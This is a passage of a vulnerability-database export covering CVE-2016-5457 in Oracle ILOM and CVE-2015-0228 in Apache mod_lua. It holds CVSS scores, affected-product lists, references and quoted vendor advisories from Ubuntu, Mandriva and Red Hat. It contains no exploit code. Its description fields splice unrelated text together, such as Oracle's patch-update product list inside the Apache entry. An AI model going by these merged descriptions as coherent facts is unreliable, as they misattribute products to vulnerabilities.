0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003987", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, ], trust: 0.6, }, cve: "CVE-2016-5457", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "nvd@nist.gov", availabilityImpact: "COMPLETE", baseScore: 9, confidentialityImpact: "COMPLETE", exploitabilityScore: 8, id: "CVE-2016-5457", impactScore: 10, integrityImpact: "COMPLETE", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:S/C:C/I:C/A:C", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "VULHUB", availabilityImpact: "COMPLETE", baseScore: 9, confidentialityImpact: "COMPLETE", exploitabilityScore: 8, id: "VHN-94276", impactScore: 10, integrityImpact: "COMPLETE", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:S/C:C/I:C/A:C", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 8.8, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.8, id: "CVE-2016-5457", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5457", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5457", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-821", trust: 0.6, value: "CRITICAL", }, { author: "VULHUB", id: "VHN-94276", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5457", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to LUMAIN. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'Multiple' protocol. The 'LUMAIN' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5457", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5457", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91995", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003987", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-821", trust: 0.7, }, { db: "VULHUB", id: "VHN-94276", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5457", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, id: "VAR-201607-0665", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94276", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:06:45.479000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63181", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5457", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5457", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91995", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5457", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5457", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94276", }, { db: "VULMON", id: "CVE-2016-5457", }, { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, { db: "JVNDB", id: "JVNDB-2016-003987", }, { db: "CNNVD", id: "CNNVD-201607-821", }, { db: "NVD", id: "CVE-2016-5457", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94276", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5457", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91995", }, { date: "2016-07-28T00:00:00", db: "JVNDB", id: "JVNDB-2016-003987", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-821", }, { date: "2016-07-21T10:15:13.677000", db: "NVD", id: "CVE-2016-5457", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94276", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5457", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91995", }, { date: "2016-07-28T00:00:00", db: "JVNDB", id: "JVNDB-2016-003987", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-821", }, { date: "2024-11-21T02:54:21.373000", db: "NVD", id: "CVE-2016-5457", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In LUMAIN Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003987", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91995", }, ], trust: 0.6, }, }
var-201503-0050
Vulnerability from variot
The lua_websocket_read function in lua_request.c in the mod_lua module in the Apache HTTP Server through 2.4.12 allows remote attackers to cause a denial of service (child-process crash) by sending a crafted WebSocket Ping frame after a Lua script has called the wsupgrade function. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Apache HTTP Server is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to trigger denial-of-service conditions. Versions prior to Apache HTTP Server 2.4.13 are vulnerable. The server is fast, reliable and extensible through a simple API. ============================================================================ Ubuntu Security Notice USN-2523-1 March 10, 2015
apache2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in the Apache HTTP Server. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-3581)
Teguh P. Alko discovered that the mod_proxy_fcgi module incorrectly handled long response headers. This issue only affected Ubuntu 14.10. (CVE-2014-3583)
It was discovered that the mod_lua module incorrectly handled different arguments within different contexts. This issue only affected Ubuntu 14.10. (CVE-2014-8109)
Guido Vranken discovered that the mod_lua module incorrectly handled a specially crafted websocket PING in certain circumstances. This issue only affected Ubuntu 14.10. (CVE-2015-0228)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: apache2.2-bin 2.4.10-1ubuntu1.1
Ubuntu 14.04 LTS: apache2.2-bin 2.4.7-1ubuntu4.4
Ubuntu 12.04 LTS: apache2.2-bin 2.2.22-1ubuntu1.8
Ubuntu 10.04 LTS: apache2.2-bin 2.2.14-5ubuntu8.15
In general, a standard system update will make all the necessary changes.
A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module.
mod_lua.c in the mod_lua module in the Apache HTTP Server through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory (CVE-2014-8109). A malicious client could use Trailer headers to set additional HTTP headers after header processing was performed by other modules. This could, for example, lead to a bypass of header restrictions defined with mod_headers (CVE-2013-5704).
Note: With this update, httpd has been modified to not merge HTTP Trailer headers with other HTTP request headers. A newly introduced configuration directive MergeTrailers can be used to re-enable the old method of processing Trailer headers, which also re-introduces the aforementioned flaw.
This update also fixes the following bug:
Prior to this update, the mod_proxy_wstunnel module failed to set up an SSL connection when configured to use a back end server using the wss: URL scheme, causing proxied connections to fail. In these updated packages, SSL is used when proxying to wss: back end servers (rhbz#1141950). The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVFnRImqjQ0CJFipgRAhbAAKDF22tbaWSxzaiqvhq0t6uM1bwWvgCfVNIJ 7XU6s8wMPlxQucpKSIVIKYI= =4uS5 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: httpd24-httpd security update Advisory ID: RHSA-2015:1666-01 Product: Red Hat Software Collections Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1666.html Issue date: 2015-08-24 CVE Names: CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 CVE-2015-3185 =====================================================================
- Summary:
Updated httpd24-httpd packages that fix multiple security issues are now available for Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3183)
It was discovered that in httpd 2.4, the internal API function ap_some_auth_required() could incorrectly indicate that a request was authenticated even when no authentication was used. An httpd module using this API function could consequently allow access that should have been denied. (CVE-2015-3185)
Note: This update introduces new a new API function, ap_some_authn_required(), which correctly indicates if a request is authenticated. External httpd modules using the old API function should be modified to use the new one to completely resolve this issue.
A denial of service flaw was found in the way the mod_lua httpd module processed certain WebSocket Ping requests. (CVE-2015-0228)
A NULL pointer dereference flaw was found in the way httpd generated certain error responses. A remote attacker could possibly use this flaw to crash the httpd child process using a request that triggers a certain HTTP error. (CVE-2015-0253)
All httpd24-httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd24-httpd service will be restarted automatically.
- Solution:
